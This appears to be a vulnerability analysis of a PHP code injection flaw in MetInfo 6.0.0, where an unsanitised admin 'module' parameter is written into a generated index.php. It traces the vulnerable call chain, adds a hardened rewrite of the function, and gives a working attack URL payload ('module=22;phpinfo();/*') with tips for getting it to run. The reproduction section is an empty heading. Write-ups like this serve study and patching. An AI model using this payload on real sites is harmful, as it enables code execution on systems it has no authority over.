0x01 Vulnerability Analysis

Key point of the vulnerability
The Copyindx function, at roughly line 878 of /Applications/MxSrvs/www/MetInfo6.0.0/admin/include/global.func.php

function Copyindx($newindx,$type){
if(!file_exists($newindx)){
$oldcont ="<?php\n# MetInfo Enterprise Content Management System \n# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. \n\$filpy = basename(dirname(__FILE__));\n\$fmodule=$type;\nrequire_once '../include/module.php'; \nrequire_once \$module; \n# This program is an open source system, commercial use, please consciously to purchase commercial license.\n# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.\n?>";
$fp = fopen($newindx,w);
fputs($fp, $oldcont);
fclose($fp);
}
}

$type is attacker-controllable and is interpolated directly into the generated PHP source. The only precondition is that the file named by $newindx does not exist yet. Tracing the callers upward:

The function is called at line 124 of /Applications/MxSrvs/www/MetInfo6.0.0/admin/column/global.func.php

Copyindx(ROOTPATH.$foldername.'/index.php',$module);

So $newindx is fixed to the directory name + /index.php, and $module is the value written into that file.

Tracing further up leads to /Applications/MxSrvs/www/MetInfo6.0.0/admin/column/save.php

if($if_in==0){
if($filename!='' && $filename!=$filenameold){
$filenameok = $db->get_one("SELECT * FROM {$met_column} WHERE filename='{$filename}' and foldername='$foldername' and id!='$id'");
if($filenameok)metsave('-1',$lang_modFilenameok);
if(is_numeric($filename) && $filename!=$id && $met_pseudo){
$filenameok1 = $db->get_one("SELECT * FROM {$met_column} WHERE id='{$filename}' and foldername='$foldername'");
if($filenameok1)metsave('-1',$lang_jsx30);
}
}
$filedir="../../".$foldername;
if(!file_exists($filedir))@mkdir($filedir,0777);
if(!file_exists($filedir))metsave('-1',$lang_modFiledir);
column_copyconfig($foldername,$module,$id);

Once the condition $if_in==0 is met, column_copyconfig() is called, which in turn reaches Copyindx() with the user-supplied $module.
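For contrast, a hardened form of Copyindx, added here as an illustration and not MetInfo's own fix: it rejects anything that is not a numeric module id (an assumption based on the numeric prefix the page's payload uses), emits the value as a PHP literal instead of string interpolation, and checks that the target path stays under ROOTPATH (assumed to be defined, as the page's call site shows).

```php
<?php
// Added example, not MetInfo's code: a Copyindx that never interpolates
// user-controlled input into generated PHP source.

function Copyindx_safe(string $newindx, $type): bool
{
    // Assumption: a module id is a plain non-negative integer. Anything else,
    // e.g. "22;phpinfo();/*", is rejected rather than written into a .php file.
    if (!is_int($type) && !is_string($type)) {
        return false;
    }
    if (!preg_match('/^\d{1,10}$/', (string) $type)) {
        return false;
    }
    $fmodule = (int) $type;

    // $newindx is built from a user-supplied folder name, so confine it to the
    // site root. ROOTPATH is assumed to be defined by the application.
    $root = realpath(ROOTPATH);
    $dir  = realpath(dirname($newindx));
    if ($root === false || $dir === false
        || strpos($dir . DIRECTORY_SEPARATOR, $root . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }

    // Keep the original "never overwrite an existing index.php" behaviour.
    if (file_exists($newindx)) {
        return true;
    }

    // var_export() produces a PHP literal, so the value cannot break out of
    // the assignment the way the interpolated $type could.
    $oldcont = "<?php\n"
        . "# MetInfo Enterprise Content Management System\n"
        . "\$filpy = basename(dirname(__FILE__));\n"
        . "\$fmodule = " . var_export($fmodule, true) . ";\n"
        . "require_once '../include/module.php';\n"
        . "require_once \$module;\n"
        . "?>";

    // Quoted mode via file_put_contents; LOCK_EX guards against a concurrent writer.
    return file_put_contents($newindx, $oldcont, LOCK_EX) !== false;
}
```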

Attack flow

  1. Log in to the admin backend
  2. Construct the payload: admin/column/save.php?name=123&action=editor&foldername=upload&module=22;phpinfo();/*
  3. Visit /upload/index.php

Notes:

  1. foldername is controllable. If an index.php already exists under the upload directory it will not be written again; just switch to another directory.
  2. The trailing /* is required: it comments out the following require_once '../include/module.php'; and prevents a redirect to the 404 page.

0x02 Reproduction
